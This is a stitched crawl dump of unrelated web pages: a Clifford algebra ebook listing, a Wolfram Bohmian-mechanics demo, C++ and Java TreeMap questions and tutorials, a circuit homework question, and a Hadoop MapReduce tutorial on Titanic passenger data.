msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9df2a21b-f622-484b-9bf3-ce02119826c6>\",\"WARC-Concurrent-To\":\"<urn:uuid:add2b838-6a3c-4a4e-a7cf-1c743850ff60>\",\"WARC-IP-Address\":\"104.110.193.39\",\"WARC-Target-URI\":\"https://nl.mathworks.com/help/stats/surrogate-splits-for-missing-data.html\",\"WARC-Payload-Digest\":\"sha1:6U7AG5LQMZ5VFBBNGDAJAKKATRN42BSS\",\"WARC-Block-Digest\":\"sha1:GGP32IHBTXUO3RPZURTONVMEI7QL4OCL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496670558.91_warc_CC-MAIN-20191120111249-20191120135249-00305.warc.gz\"}"} |
https://ebooksz.net/2021/10/15/introduction-to-clifford-algebra-a-new-perspective/ | [
"Home » Mathematics » Introduction to Clifford Algebra: A New Perspective\n\n# Introduction to Clifford Algebra: A New Perspective",
null,
"English | 2020 | ISBN: 1536185337 | 185 Pages | PDF | 6 MB\n\nThis book pursues to exhibit how we can construct a Clifford type algebra from the classical one. The basic idea of these lecture notes is to show how to calculate fundamental solutions to either firstorder differential operators of the form D=��_(i=0)^n?��e_i _i��or secondorder elliptic differential operators��D D, both with constant coefficients or combinations of this kind of operators. After considering in detail how to find the fundamental solution we study the problem of integral representations in a classical Clifford algebra and in a dependentparameter Clifford algebra whichgeneralizes the classical one. We also propose a basic method to extend the order of the operator, for instance D^n,n��N and how to produce integral representations for higher order operators and mixtures of them. Although the Clifford algebras have produced many applications concerning boundary value problems, initial value problems, mathematical physics, quantum chemistry, among others; in this book we do not discuss these topics as they are better discussed in other courses. Researchers and practitioners will find this book very useful as a source book. The reader is expected to have basic knowledge of partial differential equations and complex analysis. When planning and writing these lecture notes, we had in mind that they would be used as a resource by mathematics students interested in understanding how we can combine partial differential equations and Clifford analysis to find integral representations. This in turn would allow them to solve boundary value problems and initial value problems. To this end, proofs have been described in rigorous detail and we have included numerous worked examples. On the other hand, exercises have not been included."
] | [
null,
"https://ebooksz.net/wp-content/uploads/2021/10/Introduction-to-Clifford-Algebra-A-New-Perspective-200x300.jpg",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.931773,"math_prob":0.8651843,"size":1911,"snap":"2023-14-2023-23","text_gpt3_token_len":366,"char_repetition_ratio":0.10592554,"word_repetition_ratio":0.0,"special_character_ratio":0.18995291,"punctuation_ratio":0.0875,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9825195,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-03-28T11:44:07Z\",\"WARC-Record-ID\":\"<urn:uuid:e690a242-816a-477c-a626-2e9df1b37db6>\",\"Content-Length\":\"38633\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:65d2ea4b-9bd4-4a75-ad68-7bf849787219>\",\"WARC-Concurrent-To\":\"<urn:uuid:ebf6cd86-59a3-4797-9944-f53a9a2cf6e3>\",\"WARC-IP-Address\":\"104.21.29.120\",\"WARC-Target-URI\":\"https://ebooksz.net/2021/10/15/introduction-to-clifford-algebra-a-new-perspective/\",\"WARC-Payload-Digest\":\"sha1:7CXWYNOMX3NQQW75OS6CLBGNSUSPIGW6\",\"WARC-Block-Digest\":\"sha1:6SR5IKEK5LBT7TMG3PPHSXDPS3ESOWZ4\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-14/CC-MAIN-2023-14_segments_1679296948858.7_warc_CC-MAIN-20230328104523-20230328134523-00172.warc.gz\"}"} |
http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/ | [
"",
null,
"Causal Interpretation of the Quantum Harmonic Oscillator\n\nRequires a Wolfram Notebook System\n\nInteract on desktop, mobile and cloud with the free Wolfram CDF Player or other Wolfram Language products.\n\nRequires a Wolfram Notebook System\n\nEdit on desktop, mobile and cloud with any Wolfram Language product.\n\nThe harmonic oscillator is an important model in quantum theory that could be described by the Schrödinger equation:",
null,
", (",
null,
") with",
null,
". In this Demonstration a causal interpretation of this model is applied. A stable (nondispersive) wave packet can be constructed by a superposition of stationary eigenfunctions of the harmonic oscillator. The solution is a wave packet in the (",
null,
",",
null,
") space where the center of the packet oscillates harmonically between",
null,
"with frequency",
null,
". From the wavefunction in the eikonal representation",
null,
", the gradient of the phase function",
null,
"and therefore the equation for the motion could be calculated analytically. The motion is given by",
null,
", where",
null,
"are the initial starting points. The trajectories of the particles oscillate with the amplitude",
null,
"and frequency",
null,
"and they never cross. In practice, it is impossible to predict or control the quantum trajectories with complete precision. The effective potential is the sum of quantum potential (QP) and potential",
null,
"that leads to the time-dependent quantum force:",
null,
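"Background note (standard Bohmian mechanics, stated here because the equations above only survive as images): for a wavefunction in eikonal form ψ = R e^{iS/ħ}, the trajectory velocity field is v = ∇S/m, the quantum potential is Q = −(ħ²/2m)(∇²R)/R, and the effective force along a trajectory is −∇(Q + V).",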
".\n\n[more]\n\nOn the right side, the graphic shows the squared wavefunction and the trajectories. The left side shows the particles' positions, the squared wavefunction (blue), the quantum potential (red), the potential (black), and the velocity (green). The quantum potential and the velocity are scaled down.\n\n[less]\n\nContributed by: Klaus von Bloh (March 2011)\nOpen content licensed under CC BY-NC-SA\n\nSnapshots",
null,
"",
null,
"",
null,
"Details\n\nP. Holland, The Quantum Theory of Motion, Cambridge, England: Cambridge University Press, 1993.\n\nD. Bohm, Quantum Theory, New York: Prentice–Hall, 1951.\n\nPermanent Citation\n\nKlaus von Bloh\n\n Feedback (field required) Email (field required) Name Occupation Organization Note: Your message & contact information may be shared with the author of any specific Demonstration for which you give feedback. Send"
] | [
null,
"http://demonstrations.wolfram.com/app-files/assets/img/header-spikey2x.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc1.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc2.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc3.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc4.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc5.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc6.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc7.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc8.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc9.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc10.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc11.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc12.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc13.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc14.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/desc15.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/popup_1.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/popup_2.png",
null,
"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/img/popup_3.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.8374261,"math_prob":0.9295832,"size":2101,"snap":"2019-26-2019-30","text_gpt3_token_len":449,"char_repetition_ratio":0.13543157,"word_repetition_ratio":0.026666667,"special_character_ratio":0.18990956,"punctuation_ratio":0.13142857,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9864191,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38],"im_url_duplicate_count":[null,null,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-06-17T11:47:19Z\",\"WARC-Record-ID\":\"<urn:uuid:212692c1-3d4b-4c17-a256-8305154c3951>\",\"Content-Length\":\"35063\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cf572bb2-a91f-44a5-b6bd-7dc4dcad5e3b>\",\"WARC-Concurrent-To\":\"<urn:uuid:79e31bde-e370-4fb5-b76f-31d427fed11a>\",\"WARC-IP-Address\":\"140.177.205.90\",\"WARC-Target-URI\":\"http://demonstrations.wolfram.com/CausalInterpretationOfTheQuantumHarmonicOscillator/\",\"WARC-Payload-Digest\":\"sha1:ESQO5TPCKJGNSRBST66X3U4X6IIPERKB\",\"WARC-Block-Digest\":\"sha1:GFU4QH3DZE3UUCJSGWKAPAHKXPAV7LUZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-26/CC-MAIN-2019-26_segments_1560627998473.44_warc_CC-MAIN-20190617103006-20190617125006-00009.warc.gz\"}"} |
https://www.daniweb.com/programming/threads/504710/question-on-using-map-with-c-strings-in-c | [
"",
null,
"Hi, everyone!\n\nI have to make a function which would get a c-string of an inputted text and it would output the number of times each unique word occurs in it.\n\nOf course, I must use c-strings [yeah yeah, I know but that is what the assignment is].\n\nHere's my code:\n\n``````void analyzeWordOccurrence(char* inputtedText)\n{\n//the function gets a C-String of text inputted from the user\n//it tokenizes the words, and then counts the number of times each\n//word occurs in the inputtedText\nmap<char*,unsigned> wordCounts = map<char*,unsigned>();\n\n//tokenize the words and then add unique values to wordCounts\n//if there is already such a value, increase the corresponding count by 1\nchar* tokenPtr = strtok(inputtedText,\" \"); //begin tokenization of sentence\n\nwhile (tokenPtr != NULL) //i.e. there is a token to analyze\n{\n//extract the word\ncout << \"DEBUG: tokenPtr: \" << tokenPtr << endl;\nchar aToken[strlen(tokenPtr)];\nstrcpy(aToken,tokenPtr);\n\ncout << \"DEBUG: aToken is: \" << aToken << endl;\ncout << \"wordCounts.count(aToken) is: \" << wordCounts.count(aToken) << endl;\nif (wordCounts.count(aToken) == 0) //the token is not in the map\nwordCounts.insert( pair<char*,unsigned>(aToken,1));\nelse\nwordCounts[aToken]+=1; //token is there and increment count\n\ntokenPtr = strtok(NULL,\" \");\n}\n\ncout << \"\\nDEBUG: Done counting. The counts are: \" << endl;\nfor (auto& kv : wordCounts)\n{\ncout << kv.first << \" has value \" << kv.second << endl;\n}\n}\n``````\n\nThe issue is with the line \"wordCounts.count(aToken) == 0.\n\nSomehow it gives an output of 0 for the first word, but for the second word, it thinks that it is equal to the first word that I tokenized and put in map, and thus goes to the \"else\" statment, incrementing it to a 2 from 1.\n\nHere's my console output from debugging:\n\n``````Please <Enter> a giant line of text as input.\nDo not be afraid if your input spans multiple lines on this console as this is OK (as long as the number of characters inputted is less than 500).\n\n<Enter> here: malechi likes to exercise\nDEBUG: tokenPtr: malechi\nDEBUG: aToken is: malechi\nwordCounts.count(aToken) is: 0\nDEBUG: tokenPtr: likes\nDEBUG: aToken is: likes\nwordCounts.count(aToken) is: 1\n``````\n\nAs you can see, my function is not working, but I do not know how to fix it.\n\nWould anyone be kind to offer some advice?\n\nThanks!\n\nOne way would be to replace:\n\n``````if (wordCounts.count(aToken) == 0) //the token is not in the map\nwordCounts.insert( pair<char*,unsigned>(aToken,1));\nelse\nwordCounts[aToken]+=1;\n``````\n\nwith\n\n``````wordCounts[aToken]+=1;\n``````\n\nIf atoken is present, in the map, the value will increment by 1. If, it isn't present it will be added with the default value(0) then incremented.",
null,
"ohh wow. That's nice.\n\nThank you!!"
] | [
null,
"https://static.daniweb.com/connect/images/anonymous.png",
null,
"https://static.daniweb.com/connect/images/anonymous.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.84246564,"math_prob":0.7942689,"size":2260,"snap":"2019-43-2019-47","text_gpt3_token_len":602,"char_repetition_ratio":0.14583333,"word_repetition_ratio":0.0053908355,"special_character_ratio":0.26902655,"punctuation_ratio":0.16481069,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96369666,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-17T09:35:19Z\",\"WARC-Record-ID\":\"<urn:uuid:f90124e1-5060-4d19-bffe-e20f383103d0>\",\"Content-Length\":\"46437\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a74f44f9-dc38-4834-a45a-a68a2c1ed4c1>\",\"WARC-Concurrent-To\":\"<urn:uuid:c0d06150-25c3-4f37-b6ee-c4ccf7ed14a5>\",\"WARC-IP-Address\":\"169.55.25.107\",\"WARC-Target-URI\":\"https://www.daniweb.com/programming/threads/504710/question-on-using-map-with-c-strings-in-c\",\"WARC-Payload-Digest\":\"sha1:WEVRMOGQTARAK4JBY3U7UCKCJHFAGLF3\",\"WARC-Block-Digest\":\"sha1:CBFODT5CAT5CF4BY5RIJ2IRNSEUE25O2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496668910.63_warc_CC-MAIN-20191117091944-20191117115944-00007.warc.gz\"}"} |
https://www.geeksforgeeks.org/treemap-get-method-in-java/?ref=rp | [
"# TreeMap get() Method in Java\n\n• Difficulty Level : Easy\n• Last Updated : 28 Jun, 2018\n\nThe java.util.TreeMap.get() method of TreeMap class is used to retrieve or fetch the value mapped by a particular key mentioned in the parameter. It returns NULL when the map contains no such mapping for the key.\n\nSyntax:\n\n`Tree_Map.get(Object key_element)`\n\nParameter: The method takes one parameter key_element of object type and refers to the key whose associated value is supposed to be fetched.\n\nReturn Value: The method returns the value associated with the key_element in the parameter.\n\nBelow programs illustrates the working of java.util.TreeMap.get() method:\nProgram 1: Mapping String Values to Integer Keys.\n\n `// Java code to illustrate the get() method``import` `java.util.*;`` ` `public` `class` `Tree_Map_Demo {`` ``public` `static` `void` `main(String[] args)`` ``{`` ` ` ``// Creating an empty TreeMap`` ``TreeMap tree_map = ``new` `TreeMap();`` ` ` ``// Mapping string values to int keys`` ``tree_map.put(``10``, ``\"Geeks\"``);`` ``tree_map.put(``15``, ``\"4\"``);`` ``tree_map.put(``20``, ``\"Geeks\"``);`` ``tree_map.put(``25``, ``\"Welcomes\"``);`` ``tree_map.put(``30``, ``\"You\"``);`` ` ` ``// Displaying the TreeMap`` ``System.out.println(``\"Initial Mappings are: \"` `+ tree_map);`` ` ` ``// Getting the value of 25`` ``System.out.println(``\"The Value is: \"` `+ tree_map.get(``25``));`` ` ` ``// Getting the value of 10`` ``System.out.println(``\"The Value is: \"` `+ tree_map.get(``10``));`` ``}``}`\nOutput:\n```Initial Mappings are: {10=Geeks, 15=4, 20=Geeks, 25=Welcomes, 30=You}\nThe Value is: Welcomes\nThe Value is: Geeks\n```\n\nProgram 2: Mapping Integer Values to String Keys.\n\n `// Java code to illustrate the get() method``import` `java.util.*;`` ` `public` `class` `Tree_Map_Demo {`` ``public` `static` `void` `main(String[] args)`` ``{`` ` ` ``// Creating an empty TreeMap`` ``TreeMap tree_map = ``new` `TreeMap();`` ` ` ``// Mapping int values to string keys`` ``tree_map.put(``\"Geeks\"``, ``10``);`` ``tree_map.put(``\"4\"``, ``15``);`` ``tree_map.put(``\"Geeks\"``, ``20``);`` ``tree_map.put(``\"Welcomes\"``, ``25``);`` ``tree_map.put(``\"You\"``, ``30``);`` ` ` ``// Displaying the TreeMap`` ``System.out.println(``\"Initial Mappings are: \"` `+ tree_map);`` ` ` ``// Getting the value of \"Geeks\"`` ``System.out.println(``\"The Value is: \"` `+ tree_map.get(``\"Geeks\"``));`` ` ` ``// Getting the value of \"You\"`` ``System.out.println(``\"The Value is: \"` `+ tree_map.get(``\"You\"``));`` ``}``}`\nOutput:\n```Initial Mappings are: {4=15, Geeks=20, Welcomes=25, You=30}\nThe Value is: 20\nThe Value is: 30\n```\n\nNote: The same operation can be performed with any type of Mappings with variation and combination of different data types.\n\nMy Personal Notes arrow_drop_up"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.53595954,"math_prob":0.7415774,"size":2391,"snap":"2022-05-2022-21","text_gpt3_token_len":642,"char_repetition_ratio":0.15500629,"word_repetition_ratio":0.24590164,"special_character_ratio":0.3019657,"punctuation_ratio":0.22269808,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96844363,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-21T10:49:50Z\",\"WARC-Record-ID\":\"<urn:uuid:42f5760d-442a-43cf-991e-962c370fc6ae>\",\"Content-Length\":\"129428\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4766bb6e-3adb-4b81-8d99-5c718e0e9950>\",\"WARC-Concurrent-To\":\"<urn:uuid:b3fd4f32-a3eb-4e04-bef5-48fb0d3d79b9>\",\"WARC-IP-Address\":\"23.218.216.136\",\"WARC-Target-URI\":\"https://www.geeksforgeeks.org/treemap-get-method-in-java/?ref=rp\",\"WARC-Payload-Digest\":\"sha1:MX2M2R7JF7ZX5U7TZSH37TAQFG54W4QI\",\"WARC-Block-Digest\":\"sha1:RD5F27VQLSIPJY5XGQNM7YTZRFHWO4IW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662539049.32_warc_CC-MAIN-20220521080921-20220521110921-00487.warc.gz\"}"} |
https://electronics.stackexchange.com/questions/475877/finding-voltages-in-a-linear-circuit | [
"# Finding voltages in a linear circuit\n\nA linear circuit is shown in the figure.\n\nThe elements in this circuit have the following values: R = 100 Ohms, R2 = 200 Ohms, R3 = 350 Ohms, V = 5V, and I = 0.004 A.\n\n1. Determine the potentials of drops v_a and v_b across resistors R1 and R2 respectively.\n\n2. Now let us determine if the answers you came up with satisfy the laws of physics. (a) What is the power (in Watts) dissipated in resistor R1? (b) What is the power (in Watts) dissipated in resistor R2? (c) What is the power (in Watts) dissipated in resistor R3? (d) What is the power (in Watts) coming out of the voltage source V? (e) What is the power (in Watts) coming out of the current source I?",
null,
"From the circuit I have:\n\n$$\\-v_b + v_a + V = 0\\$$\n\n$$\\v_b - V = v_a\\$$\n\n$$\\i_1 = (v_b - V)/R_1\\$$\n\n$$\\I + i_2 = i_1\\$$\n\n$$\\(v_b - V)/R_1 = I + v_b/R_2\\$$\n\nFrom this last equation I get $$\\v_b = 10.8\\$$ and hence $$\\v_a = 5.8\\$$.\n\nHowever, apparently that is wrong. (And hence my answers to #2 were all wrong as well.) Why is that so? What might I be doing wrong?\n\n• Assuming $R=R_1$, there is only one unknown node voltage, which is $V_\\text{B}$. (Just ground the bottom node to make it $0\\:\\text{V}$.) The result should be $V_\\text{B}=3.6\\:\\text{V}$. From there, the answers just flow out. Do you see how to develop that voltage? – jonk Jan 13 at 7:54\n• Wrong sign in the last equation. And you haven't stated where i2 is. – Chu Jan 13 at 12:50\n\n• But the currents are not defined in the circuit. There is no marking of $i_1$ or $i_2$ in the circuit. – Elliot Alderson Jan 13 at 18:31"
] | [
null,
"https://i.stack.imgur.com/KjDU5.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.93057865,"math_prob":0.9983327,"size":995,"snap":"2020-34-2020-40","text_gpt3_token_len":325,"char_repetition_ratio":0.1493441,"word_repetition_ratio":0.13636364,"special_character_ratio":0.3557789,"punctuation_ratio":0.112676054,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999404,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-23T04:21:29Z\",\"WARC-Record-ID\":\"<urn:uuid:93942599-d8b7-409b-875a-3e3ad100f544>\",\"Content-Length\":\"151724\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8ea747b8-05f4-45cf-9873-46d2516a324e>\",\"WARC-Concurrent-To\":\"<urn:uuid:cb6be242-5aa4-4596-ab5b-8e1650933777>\",\"WARC-IP-Address\":\"151.101.193.69\",\"WARC-Target-URI\":\"https://electronics.stackexchange.com/questions/475877/finding-voltages-in-a-linear-circuit\",\"WARC-Payload-Digest\":\"sha1:PEJKFW7R4S7PYLOUDJNK3XTOUYHRWR7E\",\"WARC-Block-Digest\":\"sha1:AQUFEID3BIMF4PW6PAAXEXDVUVH6CTZI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400209665.4_warc_CC-MAIN-20200923015227-20200923045227-00688.warc.gz\"}"} |
https://www.geeksforgeeks.org/mapreduce-program-finding-the-average-age-of-male-and-female-died-in-titanic-disaster/?ref=rp | [
"# MapReduce Program – Finding The Average Age of Male and Female Died in Titanic Disaster\n\nAll of us are familiar with the disaster that happened on April 14, 1912. The big giant ship of 46000-ton in weight got sink-down to the depth of 13,000 feet in the North Atlantic Ocean. Our aim is to analyze the data obtained after this disaster. Hadoop MapReduce can be utilized to deal with this large datasets efficiently to find any solution for a particular problem.\n\nProblem Statement: Analyzing the Titanic Disaster dataset, for finding the average age of male and female persons died in this disaster with MapReduce Hadoop.\n\n### Step 1:\n\nWe can download the Titanic Dataset from this Link. Below is the column structure of our Titanic dataset. It consist of 12 columns where each row describes the information of a perticular person.",
null,
"### Step 2:\n\nThe first 10 records of the dataset is shown below.",
null,
"### Step 3:\n\nMake the project in Eclipse with below steps:\n\n• First Open Eclipse -> then select File -> New -> Java Project ->Name it Titanic_Data_Analysis -> then select use an execution environment -> choose JavaSE-1.8 then next -> Finish.",
null,
"• In this Project Create Java class with name Average_age -> then click Finish",
null,
"• Copy the below source code to this Average_age java class\n\n `// import libraries ` `import` `java.io.IOException; ` `import` `org.apache.hadoop.fs.Path; ` `import` `org.apache.hadoop.conf.*; ` `import` `org.apache.hadoop.io.*; ` `import` `org.apache.hadoop.mapreduce.*; ` `import` `org.apache.hadoop.mapreduce.lib.input.FileInputFormat; ` `import` `org.apache.hadoop.mapreduce.lib.input.TextInputFormat; ` `import` `org.apache.hadoop.mapreduce.lib.output.FileOutputFormat; ` `import` `org.apache.hadoop.mapreduce.lib.output.TextOutputFormat; ` ` ` `// Making a class with name Average_age ` `public` `class` `Average_age { ` ` ` ` ``public` `static` `class` `Map ``extends` `Mapper { ` ` ` ` ``// private text gender variable which ` ` ``// stores the gender of the person ` ` ``// who died in the Titanic Disaster ` ` ``private` `Text gender = ``new` `Text(); ` ` ` ` ``// private IntWritable variable age will store ` ` ``// the age of the person for MapReduce. where ` ` ``// key is gender and value is age ` ` ``private` `IntWritable age = ``new` `IntWritable(); ` ` ` ` ``// overriding map method(run for one time for each record in dataset) ` ` ``public` `void` `map(LongWritable key, Text value, Context context) ``throws` `IOException, InterruptedException ` ` ``{ ` ` ` ` ``// storing the complete record ` ` ``// in a variable name line ` ` ``String line = value.toString(); ` ` ` ` ``// spliting the line with ', ' as the ` ` ``// values are separated with this ` ` ``// delimiter ` ` ``String str[] = line.split(``\", \"``); ` ` ` ` ``/* checking for the condition where the ` ` ``number of columns in our dataset ` ` ``has to be more than 6. This helps in ` ` ``eliminating the ArrayIndexOutOfBoundsException ` ` ``when the data sometimes is incorrect ` ` ``in our dataset*/` ` ``if` `(str.length > ``6``) { ` ` ` ` ``// storing the gender ` ` ``// which is in 5th column ` ` ``gender.set(str[``4``]); ` ` ` ` ``// checking the 2nd column value in ` ` ``// our dataset, if the person is ` ` ``// died then proceed. ` ` ``if` `((str[``1``].equals(``\"0\"``))) { ` ` ` ` ``// checking for numeric data with ` ` ``// the regular expression in this column ` ` ``if` `(str[``5``].matches(``\"\\\\d+\"``)) { ` ` ` ` ``// converting the numeric ` ` ``// data to INT by typecasting ` ` ``int` `i = Integer.parseInt(str[``5``]); ` ` ` ` ``// storing the person of age ` ` ``age.set(i); ` ` ``} ` ` ``} ` ` ``} ` ` ``// writing key and value to the context ` ` ``// which will be output of our map phase ` ` ``context.write(gender, age); ` ` ``} ` ` ``} ` ` ` ` ``public` `static` `class` `Reduce ``extends` `Reducer { ` ` ` ` ``// overriding reduce method(runs each time for every key ) ` ` ``public` `void` `reduce(Text key, Iterable values, Context context) ` ` ``throws` `IOException, InterruptedException ` ` ``{ ` ` ` ` ``// declaring the variable sum which ` ` ``// will store the sum of ages of people ` ` ``int` `sum = ``0``; ` ` ` ` ``// Variable l keeps incrementing for ` ` ``// all the value of that key. 
` ` ``int` `l = ``0``; ` ` ` ` ``// foreach loop ` ` ``for` `(IntWritable val : values) { ` ` ``l += ``1``; ` ` ``// storing and calculating ` ` ``// sum of values ` ` ``sum += val.get(); ` ` ``} ` ` ``sum = sum / l; ` ` ``context.write(key, ``new` `IntWritable(sum)); ` ` ``} ` ` ``} ` ` ` ` ``public` `static` `void` `main(String[] args) ``throws` `Exception ` ` ``{ ` ` ``Configuration conf = ``new` `Configuration(); ` ` ` ` ``@SuppressWarnings``(``\"deprecation\"``) ` ` ``Job job = ``new` `Job(conf, ``\"Averageage_survived\"``); ` ` ``job.setJarByClass(Average_age.``class``); ` ` ` ` ``job.setMapOutputKeyClass(Text.``class``); ` ` ``job.setMapOutputValueClass(IntWritable.``class``); ` ` ` ` ``// job.setNumReduceTasks(0); ` ` ``job.setOutputKeyClass(Text.``class``); ` ` ``job.setOutputValueClass(IntWritable.``class``); ` ` ` ` ``job.setMapperClass(Map.``class``); ` ` ``job.setReducerClass(Reduce.``class``); ` ` ` ` ``job.setInputFormatClass(TextInputFormat.``class``); ` ` ``job.setOutputFormatClass(TextOutputFormat.``class``); ` ` ` ` ``FileInputFormat.addInputPath(job, ``new` `Path(args[``0``])); ` ` ``FileOutputFormat.setOutputPath(job, ``new` `Path(args[``1``])); ` ` ``Path out = ``new` `Path(args[``1``]); ` ` ``out.getFileSystem(conf).delete(out); ` ` ``job.waitForCompletion(``true``); ` ` ``} ` `} `\n\n`hadoop version`",
null,
"• Now we add these external jars to our Titanic_Data_Analysis project. Right Click on Titanic_Data_Analysis -> then select Build Path-> Click on Configue Build Path and select Add External jars…. and add jars from it’s download location then click -> Apply and Close.",
null,
"• Now export the project as jar file. Right-click on Titanic_Data_Analysis choose Export.. and go to Java -> JAR file click -> Next and choose your export destination then click -> Next. Choose Main Class as Average_age by clicking -> Browse and then click -> Finish -> Ok.",
null,
"",
null,
"### Step 4:\n\n`start-dfs.sh`\n`start-yarn.sh`\n\n`jps`",
null,
"### Step 5:\n\nSyntax:\n\n```hdfs dfs -put /file_path /destination\n```\n\nIn below command / shows the root directory of our HDFS.\n\n```hdfs dfs -put /home/dikshant/Documents/titanic_data.txt /\n```\n\nCheck the file sent to our HDFS.\n\n```hdfs dfs -ls /\n```",
null,
"### Step 6:\n\nNow Run your Jar File with below command and produce the output in Titanic_Output File.\n\nSyntax:\n\n```hadoop jar /jar_file_location /dataset_location_in_HDFS /output-file_name\n```\n\nCommand:\n\n```hadoop jar /home/dikshant/Documents/Average_age.jar /titanic_data.txt /Titanic_Output\n```",
null,
"### Step 7:\n\nNow Move to localhost:50070/, under utilities select Browse the file system and download part-r-00000 in /MyOutput directory to see result.\n\nNote: We can also view the result with below command\n\n`hdfs dfs -cat /Titanic_Output/part-r-00000`",
null,
"In the above image, we can see that the average age of the female is 28 and male is 30 according to our dataset who died in the Titanic Disaster.\n\nMy Personal Notes arrow_drop_up",
null
] | [
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708142705/dataset-discription-of-titanic-dataset.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708142821/titanic-dataset-first-10-records.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708143747/creating-titanic-data-analysis-project.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708144313/creating-average-age-java-class.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200704091836/hadoop-version.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708153503/adding-external-jar-files1.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200704093228/export-java-Titanic_Data_Analysis-project.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708145623/selecting-main-class.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708150333/check-running-hadoop-daemons.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708150733/putting-titanic-dataset-to-HDFS.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708151303/running-the-average-age-jar-file.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708152129/output300.png",
null,
"https://media.geeksforgeeks.org/auth/avatar.png",
null
